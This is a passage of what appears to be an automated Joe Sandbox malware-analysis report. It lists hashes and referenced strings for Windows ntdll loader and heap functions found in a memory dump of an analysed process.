                                                • Opcode ID: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                • Instruction ID: a8a64fef1e46d6b4c44e16f888cab617dce1ae40a9fb23cd486e93f1f7267977
                                                • Opcode Fuzzy Hash: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                • Instruction Fuzzy Hash: 3B61DD74604701DFDB6DCF28C484B6ABBF6FF49708F14855AE46A8B282D774E881CB91
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011F82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 011F82D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 011F82DE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                • Instruction ID: 68492e8fb42012121c014f56b2a556b8f62c61e8d6320d60a267150769969b89
                                                • Opcode Fuzzy Hash: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                • Instruction Fuzzy Hash: ED412375654701ABDB29EB68EC88F9B77E8FF44654F00492AF958D3260E774E800CBD2
                                                Strings
                                                • PreferredUILanguages, xrefs: 0123C212
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0123C1C5
                                                • @, xrefs: 0123C1F1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                • Instruction ID: 817163a943069fafa1bdcc969e133aef85bb68bbd98b3e48533dc4e23f770fdd
                                                • Opcode Fuzzy Hash: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                • Instruction Fuzzy Hash: 714188B1E1021AEBDF15DBD8C841FEEBBB8AB54704F04406BEA05F7240D7749A54CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                • Instruction ID: d3b9a7f8b0fae6b8fe8e33c8a857a1fa6f887ece961212613287fa4807020644
                                                • Opcode Fuzzy Hash: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                • Instruction Fuzzy Hash: AA4137319202998BEB26EFE8C844BECBBF4FF65344F24045ADA15EB785D7748941CB50
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01204899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01204888
                                                • LdrpCheckRedirection, xrefs: 0120488F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                • Instruction ID: bcaa9145c50f7bee2a6292d0d9a30b8d1fda5ab39b806896a909076bb6c2090e
                                                • Opcode Fuzzy Hash: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                • Instruction Fuzzy Hash: 3541D632A246928FDB27EE18D841A277BE4EF89650B05875DEF44972A3D330D900CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                • Instruction ID: 89a905a982cd38490cbcaf836d3d3d970e73142feb94e315fe150baa1bf3f33f
                                                • Opcode Fuzzy Hash: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                • Instruction Fuzzy Hash: 3511E135314502DFDBADDA18C858B76B7EAEF44619F19811DF426CB251EB30D840C756
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01202104
                                                • LdrpInitializationFailure, xrefs: 012020FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 012020F3
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                • Instruction ID: 8f849098f9232bf2b8dd32b789b5dea56b944182784586a996131a69bc9977be
                                                • Opcode Fuzzy Hash: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                • Instruction Fuzzy Hash: 4AF02834650309FFE728E60CDC0AF96B76CEB80B44F100019F700772C6D3B0A510CA81
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                • Instruction ID: 90af4c9ff4a4605330c999c1db9f21a4b949978a13fd9d315590410ab7e5f412
                                                • Opcode Fuzzy Hash: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                • Instruction Fuzzy Hash: 41716871A0054A9FDF09DFA8C994BAEB7F8BF18744F154069E910E7251EB34EE01CBA0
                                                Strings
                                                • LdrResSearchResource Exit, xrefs: 0118AA25
                                                • LdrResSearchResource Enter, xrefs: 0118AA13
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                • Instruction ID: 3f57aab0e050e5b76c55007acd758ddea7a37ea53b4976a385ea722482cb4c3d
                                                • Opcode Fuzzy Hash: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                • Instruction Fuzzy Hash: 69E19E71A00619AFEB2EDFD8D994BAEBBB9BF04310F15842AE911E7241E734D940CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 750a3aaf8b7aba02703573b67bb1f2ca9efa7a8e226da7f7eb40aaddaf0fab61
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: D6C1C1312643429FEB29CF28C841B6BBBE5EFD4718F084A2DF6968B291D774D505CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                • Instruction ID: b41beb10240b5be1825a6150513c41330f92b6e7adf972c565bed64952db458c
                                                • Opcode Fuzzy Hash: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                • Instruction Fuzzy Hash: C9616C72E017199FDB29DFA8C850BAEBBB9FB44704F15412DE649EB261D731E900CB50
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
                                                • Instruction ID: 7bdf8486b1bb79785d4fb68244c852d443d5eda3b813266caa375afa44e65522
                                                • Opcode Fuzzy Hash: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
                                                • Instruction Fuzzy Hash: 0C512971D1066EAFDF15EFA9CC80AEEBBB8EB54758F100529E611B7290D7309A05CB60
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0118063D
                                                • kLsE, xrefs: 01180540
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: b05844e74a5efaf3f6164d0a2f47d75de951ff71f618ae3479a41d651d9ab848
                                                • Instruction ID: 5b45f1418589d341c7ab7182b9bd4c7c674dfd568cff3ef6be09d57ab6353c64
                                                • Opcode Fuzzy Hash: b05844e74a5efaf3f6164d0a2f47d75de951ff71f618ae3479a41d651d9ab848
                                                • Instruction Fuzzy Hash: 8951B37150474A8FD728EF28C4446A7B7E4AF89308F24883DF9A987241E770D549CFA2
                                                Strings
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0118A2FB
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0118A309
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: 88ec7e765217d4a03e1f708620e98e62e746ffbf5466bd0c92efbb8456925d26
                                                • Instruction ID: 55b2471fa294a757834c32020b7f7ddc6493815ed4e78baa2f6cc35fc1c63095
                                                • Opcode Fuzzy Hash: 88ec7e765217d4a03e1f708620e98e62e746ffbf5466bd0c92efbb8456925d26
                                                • Instruction Fuzzy Hash: E241BE30A08A49CBDB29DFA9D454B6D7BF4FF84304F2480AAED10DB291E375D900CB41
                                                Strings
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 26d229a0c0b709169173a68104047a3a449245acff1e82e9a57b4d33d4792046
                                                • Instruction ID: 4e372062762f28c1e1ffbab4f6b9366b496e8b6843ad9d240a771ed8b2df9829
                                                • Opcode Fuzzy Hash: 26d229a0c0b709169173a68104047a3a449245acff1e82e9a57b4d33d4792046
                                                • Instruction Fuzzy Hash: 3C0121B2200700AFE315DF14DD89F667BE8EB90B19F008839E618C7190E738E804CB46
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: 95a8012c9106aa7bc450b85502003152ddb2b336881914bbcd52c2ec4d3ec935
                                                • Instruction ID: f94a1ae593897a8491db7653ee53003cb584507224349993355578b3e6273fbe
                                                • Opcode Fuzzy Hash: 95a8012c9106aa7bc450b85502003152ddb2b336881914bbcd52c2ec4d3ec935
                                                • Instruction Fuzzy Hash: F0825C75E003198BEF29EFA9D880BEDBBB1BF44350F14C169E919AB291D7309941CF91
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 9ef6eb127e47358391ad0c6417c9f97701ff5ff9e319ba1eb566a0ebd8d080fe
                                                • Instruction ID: 2f19729b90d4a8579d8a7e0758933c1ecb840a5c9f68590af6b6ca7f035a8d93
                                                • Opcode Fuzzy Hash: 9ef6eb127e47358391ad0c6417c9f97701ff5ff9e319ba1eb566a0ebd8d080fe
                                                • Instruction Fuzzy Hash: 7291917195061AAFEB26DF95CC85FAEBBB8EF14B54F100125F600AB1D1D775AD00CBA0
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 7e7f244b1acf78c5ec5d9c15deb76c8056e14ef248c3238c316840be887aacfc
                                                • Instruction ID: 6e385a54604a51b990a7010d6641c4f8eb816a87196c695b817036919ad1cb7d
                                                • Opcode Fuzzy Hash: 7e7f244b1acf78c5ec5d9c15deb76c8056e14ef248c3238c316840be887aacfc
                                                • Instruction Fuzzy Hash: 7C91FE3192061ABEDF26EBA4CC80FEFBB79EF55744F110029F615A7250DB749901DB90
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: fccc8a8d4e54f3c785a9c5d7b84cb97502c07885da7915eaacae0831d9b37126
                                                • Instruction ID: b8a64cfd32e34100ab666c5efbf6e62fb68e1d13ff10720b90704ff079b24857
                                                • Opcode Fuzzy Hash: fccc8a8d4e54f3c785a9c5d7b84cb97502c07885da7915eaacae0831d9b37126
                                                • Instruction Fuzzy Hash: 2F717BB5E0071A9FDF2CCF98D5906EDBBB2BF48710F14812EEA06A7245E7319841CB50
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 9e0882fd8a7a5f4f2a7cb03413e0a67380d8f9ef30c8673a58a638cd1907e6f5
                                                • Instruction ID: c86a82c27694b740a66beb89d442fe464da42e3628fb88d6c3e6f489f85997a2
                                                • Opcode Fuzzy Hash: 9e0882fd8a7a5f4f2a7cb03413e0a67380d8f9ef30c8673a58a638cd1907e6f5
                                                • Instruction Fuzzy Hash: 3351A572D2027AEBDF15EF99D840BAEBBB4BF14A14F054129EA15BB250D3749C01CBA4
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: e40042e0fa29a97cd1a655c725bbf2fe97a89c71ed245f299ceda63d2882f919
                                                • Instruction ID: 51ae2ece1dbe7d2784f7321fea86c373e0d5489146d75d1b751cd963b91174af
                                                • Opcode Fuzzy Hash: e40042e0fa29a97cd1a655c725bbf2fe97a89c71ed245f299ceda63d2882f919
                                                • Instruction Fuzzy Hash: 4641927150A742ABDB1DDA75C880B6FBBE8AF88618F44092DF5A4D7140E774D904C7D3
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 4d77bb34eb1039555258d12a380bb935a1b27c998e9fee5d8e70d7d4ed4212a6
                                                • Instruction ID: 74a13e5afd9835db14d7424df790d3a362ad2f48a385c8ad8e3531234ca0b332
                                                • Opcode Fuzzy Hash: 4d77bb34eb1039555258d12a380bb935a1b27c998e9fee5d8e70d7d4ed4212a6
                                                • Instruction Fuzzy Hash: A84133B1D0052DABDB25DA50CC84FDEB77CAB54718F0045E9EB08AB140DB709E899FE4
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 6d12e9fd375e711b9118fab75777ac1967aed2bedd1937b36ab788203239375a
                                                • Instruction ID: 7cea2313876897318408ab50d674fe506d5743b4ba8d6e8dc74618c8682297d6
                                                • Opcode Fuzzy Hash: 6d12e9fd375e711b9118fab75777ac1967aed2bedd1937b36ab788203239375a
                                                • Instruction Fuzzy Hash: 00312C31A1071A9BEB22CF69C858BEE7BF8DF24704F14402CEA50AB281D7B5D905CB50
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 0114a5fe8d50548a0af919cbc1e275bdfe10fcef858748e912c80b18b26f4eb0
                                                • Instruction ID: 9e9e97c52c5fd2300976b48798c588c13b4192a9189f4ad5484c759d641dc2fa
                                                • Opcode Fuzzy Hash: 0114a5fe8d50548a0af919cbc1e275bdfe10fcef858748e912c80b18b26f4eb0
                                                • Instruction Fuzzy Hash: 3331053A90051DAFEB1EDB59C845FAFBB74EB80790F01412DAA15A7250D7309E04EBE0
                                                Strings
                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0120895E
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                • API String ID: 0-702105204
                                                • Opcode ID: fbbff216882803c968cad67122a455ef3a2326b80446d6e68b421ef76bd70d0a
                                                • Instruction ID: bdf7482d1ef71025a95077e9fa4f8efad5f3dadf7cb2bf55f8226ac728b9c50d
                                                • Opcode Fuzzy Hash: fbbff216882803c968cad67122a455ef3a2326b80446d6e68b421ef76bd70d0a
                                                • Instruction Fuzzy Hash: 7701F73273020A9BEB267B599C84A6BBB65EF85254B05021CF74116693CB706C81C792
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c07e955139bd8c9a5cd8f36e7628ab09709e68947b5952ba92b4900eac502930
                                                • Instruction ID: 017fd8a2ab86df339b6f5024b899701c818dad725df11bbb07e76a18ee7a5dc7
                                                • Opcode Fuzzy Hash: c07e955139bd8c9a5cd8f36e7628ab09709e68947b5952ba92b4900eac502930
                                                • Instruction Fuzzy Hash: DC42D331628352EBD725CF68C880A6FBBE5EF98304F58092DFB8297250D772D945CB52
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af75bb40dd47bdaff1e4cb7bc1c78ccf53b7533e489264e0065756a12bcf1784
                                                • Instruction ID: 49e3d8881c532ba57f3163c1c1dd5b7b629b26ed1b239b99e222eb11f3c8a0f1
                                                • Opcode Fuzzy Hash: af75bb40dd47bdaff1e4cb7bc1c78ccf53b7533e489264e0065756a12bcf1784
                                                • Instruction Fuzzy Hash: 6C427D75E102198FEB25CF69C881BADBBF5FF58300F198099EA49EB245DB349981CF50
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db3f665fccac5ef982a26fb1485f0b935e8872fc9005a5f5d738360e86149150
                                                • Instruction ID: f105e3db5ea4e888895d8bcabead5677178154190d74ae3ec35975333d0f3ffa
                                                • Opcode Fuzzy Hash: db3f665fccac5ef982a26fb1485f0b935e8872fc9005a5f5d738360e86149150
                                                • Instruction Fuzzy Hash: A132EF70A00B559FEB2CCFA9C848BBEBBF2BFA4704F54411DD4969B285E735A801CB51
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e40a6be6e3cc4a376b0c588c4df34ea1894a106981b9a0d01aa10a0e71f527ca
                                                • Instruction ID: 3f013923adb1833454decf5195857b5f87eabfa3edf231f17d4541d7b07eab1f
                                                • Opcode Fuzzy Hash: e40a6be6e3cc4a376b0c588c4df34ea1894a106981b9a0d01aa10a0e71f527ca
                                                • Instruction Fuzzy Hash: 8722CE70634672AFEB25CF2DC05137ABBE1AF45300F08845AEA868BE86D775D452CB60
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6dddb89cbc6464aaf4c9ee15fbc70cb7a69a007599eda69654d096d18ca2f9a
                                                • Instruction ID: 87eb01a3729e396e7b801fbcd312122928f1f6606f2a0750f1e623c58878a005
                                                • Opcode Fuzzy Hash: b6dddb89cbc6464aaf4c9ee15fbc70cb7a69a007599eda69654d096d18ca2f9a
                                                • Instruction Fuzzy Hash: 08329A70A04605DFDB29DFA8C880AAEBBF1FF48314F248569E956AB391D734E841CF51
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 7c7f43e4e0ce87553612bc8c6ed2b8556fddfff4c5d910d06545fd7cabfebc30
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: FDF18074E0061A9BDB1DCF99C580BAEBFF5AF48314F498129E905AB744E7B4EC41CB90
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 485d73c15c395927040a26881249d562fe5317104de3ab9919537c3da9cbcf01
                                                • Instruction ID: c8ad91c817f5903bd74193e853c6b71a46c09530e8277d5637407169e60bc08a
                                                • Opcode Fuzzy Hash: 485d73c15c395927040a26881249d562fe5317104de3ab9919537c3da9cbcf01
                                                • Instruction Fuzzy Hash: 1ED1F572E2060A8BDF19CF68C881AFEB7F2BF94304F188169D955E7245E735E905CB50
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e12a04fa39c0c8c80e471f4d3f8b6e233c1a8b6ba056dd52a1261d0c80f0f9c6
                                                • Instruction ID: 3e4a617f6e8f5eea7b7e6e769e95f371083582ccc1bbd1700e4e9521c9729f13
                                                • Opcode Fuzzy Hash: e12a04fa39c0c8c80e471f4d3f8b6e233c1a8b6ba056dd52a1261d0c80f0f9c6
                                                • Instruction Fuzzy Hash: 33E1A171608342CFC719EF28C490A6ABBE1FF89308F15896DE99987351E731E905CF92
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64aece0304efe32d0dc8aa82f0aefea932764f658ac72f5f091aef22e311e09a
                                                • Instruction ID: 03ce969232aed18e032158b4715ae2dceea1de768adf097d135ec9d41ecb7848
                                                • Opcode Fuzzy Hash: 64aece0304efe32d0dc8aa82f0aefea932764f658ac72f5f091aef22e311e09a
                                                • Instruction Fuzzy Hash: 17D1E171A006069BDB1CDF29C884ABEB7B5BF55308F06862DEA17DB380E730E951CB50
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: b8ccdb53f724db6ba9b3637a5ca6839f8c9bf2365e44de63ea23e00495e6abd2
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: 81B16474E106059FDF26DF59C940AABBBB9FF84304F10455EAA42977D2DB34E905CB10
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction ID: 1a424679a17f42066ef6cd7a605c36490eddf046a7f9a6b060f73b34c5dd7aae
                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction Fuzzy Hash: 32B12931600A46AFDF1DCBA8C854BBEBBFAAF88704F154159E662D7281D730DD41CB91
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df0e84af47be6b443e3e714e76ce2454b99991bd09fd807a211da953c22dbbbe
                                                • Instruction ID: bf01133f637c3d33f8b7e650653a294088c72021290a72ecad99a773ee15e0be
                                                • Opcode Fuzzy Hash: df0e84af47be6b443e3e714e76ce2454b99991bd09fd807a211da953c22dbbbe
                                                • Instruction Fuzzy Hash: FFC17874208341DFD768DF18C484BABB7E5BF88304F44896DE98987291E774E948CFA2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4c3ba6e48d56ab77fa9304e12dd7b60bd284d6b1b5b44061caf609e91eb4048
                                                • Instruction ID: f5318e07bbb96bf1460f1eb0e002ac99fba03397f8c6e02eb7f464c03deacca4
                                                • Opcode Fuzzy Hash: e4c3ba6e48d56ab77fa9304e12dd7b60bd284d6b1b5b44061caf609e91eb4048
                                                • Instruction Fuzzy Hash: 49B16070B002668BDB68CF68C890BA9B7B1EF44704F0485E9D54AE7341EB71DDC6CB61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d17972ff7e8559fcd07f64f13bd1771b65e0585672bfa9326252df8b61b23df
                                                • Instruction ID: fcfe4efbcfe4763351556c45aea30a6dcce3455575796896bf84f7bc4babfd95
                                                • Opcode Fuzzy Hash: 7d17972ff7e8559fcd07f64f13bd1771b65e0585672bfa9326252df8b61b23df
                                                • Instruction Fuzzy Hash: 80A10235E01A1A9FEB2DDBA8C848FAEBFF4AB04714F150125EE11AB281D7749D41CBD1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40d7be8f2d56042a6c791c042b1412af80f6fcec2d46a9f61fa3ab1bf5e686b4
                                                • Instruction ID: 8c5aadb93247660acdfc09aaa4ef2d4a869be20f8a86668b635f76ba00313ccd
                                                • Opcode Fuzzy Hash: 40d7be8f2d56042a6c791c042b1412af80f6fcec2d46a9f61fa3ab1bf5e686b4
                                                • Instruction Fuzzy Hash: CFA1A174B0061ADFDB2DDF69C590BAAB7B5FF68B18F10402DFA0597281DB34A811CB50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5af30fdb7a639e312fc9a6d6fde10ba41b98c992b4af1094fae707f93d35138
                                                • Instruction ID: d3316b62c85276fd22b95ff7642f19518ff06def7bd2ca1f3790bf1a7ff2c846
                                                • Opcode Fuzzy Hash: e5af30fdb7a639e312fc9a6d6fde10ba41b98c992b4af1094fae707f93d35138
                                                • Instruction Fuzzy Hash: F4A1F172624682EFD759EF18C980B5ABBE9FF58708F04052CEA49DB650E334ED40CB91
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39701751158e6599aeaac70475110c6ec3b1961e7d3b9cec4d3ccb0f1e4eb450
                                                • Instruction ID: b8ae8ccac0c4750bf065d2e74e1ab84da0cf14ff6c7a40f58e2cbb30e7822efa
                                                • Opcode Fuzzy Hash: 39701751158e6599aeaac70475110c6ec3b1961e7d3b9cec4d3ccb0f1e4eb450
                                                • Instruction Fuzzy Hash: 55919471D10216AFDF16CFA8D884BBEBFB5AF48710F154269E610EB382D774D9109BA0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
